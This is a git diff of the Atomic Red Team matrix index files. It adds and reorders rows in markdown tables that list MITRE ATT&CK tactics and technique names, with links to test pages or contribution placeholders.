-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -60,5 +60,6 @@
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 5c681900..a4b8e7ab 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -1,102 +1,112 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
